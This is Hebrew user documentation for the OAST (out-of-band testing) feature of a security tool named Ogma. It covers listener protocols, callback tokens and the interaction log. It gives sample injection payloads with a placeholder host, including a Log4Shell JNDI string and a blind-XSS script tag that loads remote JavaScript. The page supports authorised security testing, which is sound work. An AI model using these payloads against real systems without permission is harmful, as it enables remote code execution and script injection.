דילוג לתוכן

OAST ​

OAST (בדיקות אבטחת יישומים מחוץ לערוץ) מזהה חולשות שאינן יוצרות תגובה גלויה; במקום זאת, היעד יוצר חיבור יוצא למאזין שבשליטתכם, ובכך מאשר את הבעיה.

איך זה עובד ​

Ogma מפעיל מאזינים מקומיים למספר פרוטוקולים. כאשר יישום היעד פונה לאחד המאזינים האלה, האינטראקציה מתועדת עם כתובת ה-IP של המקור, חותמת הזמן, הנתונים שהתקבלו והאסימון שהוזרק.

פרוטוקולי המאזין ​

פרוטוקולפורט ברירת מחדלשימוש
HTTPניתן להגדרהSSRF, XSS עיוור, וובהוקים
HTTPSניתן להגדרהSSRF דרך TLS
DNSניתן להגדרההזרקה עיוורת, XXE, log4shell
SMTPניתן להגדרההזרקת כותרות דוא״ל, SSRF לשירותי דואר

הגדירו את פורטי המאזין ואת שם הדומיין המשמש באסימונים שנוצרים בחלונית ההגדרות של OAST.

יצירת אסימון לקריאה חוזרת ​

  1. פתחו את כלי עזר > OAST.
  2. לחצו על יצירת אסימון. כל אסימון ייחודי לבדיקה שלו.
  3. העתיקו את האסימון. הוא כולל את דומיין המאזין ומזהה ייחודי, כך שאפשר לשייך אינטראקציות בחזרה לבדיקה המסוימת.

דוגמה לפורמט אסימון: [unique-id].[your-oast-domain]

שימוש באסימונים במטענים ​

הזריקו את אסימון הקריאה החוזרת לכל שדה שבו היישום עשוי ליצור חיבור יוצא:

  • SSRF: השתמשו באסימון HTTP/HTTPS בתור כתובת ה-URL של היעד: https://[token]/
  • XXE: הפנו לאסימון ב-DOCTYPE או בכתובת URL של ישות חיצונית.
  • Log4Shell: שלבו אותו בכותרת: ${jndi:ldap://[token]/a}
  • XSS עיוור: הזריקו אותו כ-src של סקריפט: <script src="https://[token]/x.js"></script>
  • הזרקת SMTP: השתמשו בו ככתובת יעד או כ-URL בכותרות דוא״ל.

יומן אינטראקציות ​

חלונית האינטראקציות מציגה כל קריאה חוזרת שהתקבלה:

עמודהתיאור
זמןמועד קבלת האינטראקציה
פרוטוקולHTTP, HTTPS, DNS או SMTP
IP מקורכתובת ה-IP שיצרה את החיבור
אסימוןהאסימון שאליו בוצעה הפנייה
נתוניםנתיב הבקשה, שם שאילתת DNS או נתוני SMTP

לחצו על שורה כלשהי כדי לראות את פרטי האינטראקציה המלאים, כולל כותרות הבקשה והגוף, כאשר הם רלוונטיים.

התאמת אינטראקציות לבדיקות ​

מכיוון שכל אסימון ייחודי, אפשר להזריק אסימונים שונים לפרמטרים או לבקשות שונים ולקבוע בדיוק איזו נקודת הזרקה הפעילה את הקריאה החוזרת.

תוכנה קניינית. כל הזכויות שמורות.